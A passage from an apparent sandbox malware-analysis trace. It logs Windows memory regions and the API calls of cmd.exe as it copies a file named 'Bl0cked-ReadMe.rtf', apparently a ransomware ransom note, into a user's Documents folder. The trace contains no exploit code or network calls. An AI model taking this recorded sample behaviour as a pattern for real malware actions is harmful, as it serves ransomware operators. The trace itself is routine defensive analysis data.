entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14785 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14786 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14787 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14788 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14789 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14790 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14791 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15215 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15216 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15217 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 15218 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 15219 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15220 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15221 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15222 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15223 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15224 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15225 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15228 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 15229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15231 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15232 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15233 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 15234 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15235 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 15236 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 15237 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 220 os_tid = 0xda8 [0139.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fddc | out: lpSystemTimeAsFileTime=0x16fddc*(dwLowDateTime=0x8d0896a0, dwHighDateTime=0x1d440a9)) [0139.426] GetCurrentProcessId () returned 0xd90 [0139.426] GetCurrentThreadId () returned 0xda8 [0139.426] GetTickCount () returned 0x2bd84 [0139.426] QueryPerformanceCounter (in: lpPerformanceCount=0x16fdd4 | out: lpPerformanceCount=0x16fdd4*=19621505876) returned 1 [0139.426] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.433] __set_app_type (_Type=0x1) [0139.433] __p__fmode () returned 0x76b331f4 [0139.433] __p__commode () returned 0x76b331fc [0139.433] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.433] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.433] GetCurrentThreadId () returned 0xda8 [0139.433] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda8) returned 0x38 [0139.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.433] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.433] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.437] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.437] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fd6c | out: phkResult=0x16fd6c*=0x0) returned 0x2 [0139.437] VirtualQuery (in: lpAddress=0x16fda3, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.437] GetConsoleOutputCP () returned 0x1b5 [0139.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.462] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.462] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.466] GetEnvironmentStringsW () returned 0x250188* [0139.466] FreeEnvironmentStringsW (penv=0x250188) returned 1 [0139.466] GetEnvironmentStringsW () returned 0x250188* [0139.466] FreeEnvironmentStringsW (penv=0x250188) returned 1 [0139.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecdc | out: phkResult=0x16ecdc*=0x40) returned 0x0 [0139.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0xb0, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x0, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegCloseKey (hKey=0x40) returned 0x0 [0139.467] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecdc | out: phkResult=0x16ecdc*=0x40) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x0, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x9, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x9, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x9, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegCloseKey (hKey=0x40) returned 0x0 [0139.467] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.467] srand (_Seed=0x5b88636e) [0139.467] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0139.467] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0139.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.468] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.468] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.468] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.468] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.468] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.468] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.468] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.468] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.468] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.468] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.468] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.468] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.468] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.468] GetEnvironmentStringsW () returned 0x2522d8* [0139.468] FreeEnvironmentStringsW (penv=0x2522d8) returned 1 [0139.468] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.468] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.468] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.468] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.468] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.468] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.468] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.468] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.468] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.468] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16faa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.469] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16faa8, lpFilePart=0x16faa4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16faa4*="Desktop") returned 0x18 [0139.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.469] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f824 | out: lpFindFileData=0x16f824) returned 0x250018 [0139.469] FindClose (in: hFindFile=0x250018 | out: hFindFile=0x250018) returned 1 [0139.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f824 | out: lpFindFileData=0x16f824) returned 0x250018 [0139.469] FindClose (in: hFindFile=0x250018 | out: hFindFile=0x250018) returned 1 [0139.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f824 | out: lpFindFileData=0x16f824) returned 0x250018 [0139.469] FindClose (in: hFindFile=0x250018 | out: hFindFile=0x250018) returned 1 [0139.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.469] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.469] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.469] GetEnvironmentStringsW () returned 0x252af8* [0139.470] FreeEnvironmentStringsW (penv=0x252af8) returned 1 [0139.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.470] GetConsoleOutputCP () returned 0x1b5 [0139.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.470] GetUserDefaultLCID () returned 0x409 [0139.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fbe8, cchData=128 | out: lpLCData="0") returned 2 [0139.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fbe8, cchData=128 | out: lpLCData="0") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fbe8, cchData=128 | out: lpLCData="1") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.483] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.484] GetConsoleTitleW (in: lpConsoleTitle=0x2408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.485] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.485] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.485] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.485] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.486] _wcsicmp (_String1="type", _String2=")") returned 75 [0139.486] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0139.486] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0139.486] _wcsicmp (_String1="IF", _String2="type") returned -11 [0139.486] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0139.486] _wcsicmp (_String1="REM", _String2="type") returned -2 [0139.486] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0139.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.490] GetFileType (hFile=0x7) returned 0x2 [0139.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.509] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16fae0 | out: lpMode=0x16fae0) returned 1 [0139.521] _dup (_FileHandle=1) returned 3 [0139.521] _close (_FileHandle=1) returned 0 [0139.522] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0139.522] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16fab0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0139.522] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0139.522] GetConsoleTitleW (in: lpConsoleTitle=0x16f8e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.522] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0139.522] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0139.522] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0139.522] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0139.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.523] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f444, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f444) returned 0x240e78 [0139.523] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0139.523] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0139.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0139.523] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e350, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0139.524] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] GetFileType (hFile=0x54) returned 0x1 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e3a8 | out: lpFileSizeHigh=0x16e3a8*=0x0) returned 0x1632 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.524] GetFileType (hFile=0x4c) returned 0x1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.524] GetFileType (hFile=0x4c) returned 0x1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.524] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] GetFileType (hFile=0x4c) returned 0x1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] GetFileType (hFile=0x4c) returned 0x1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 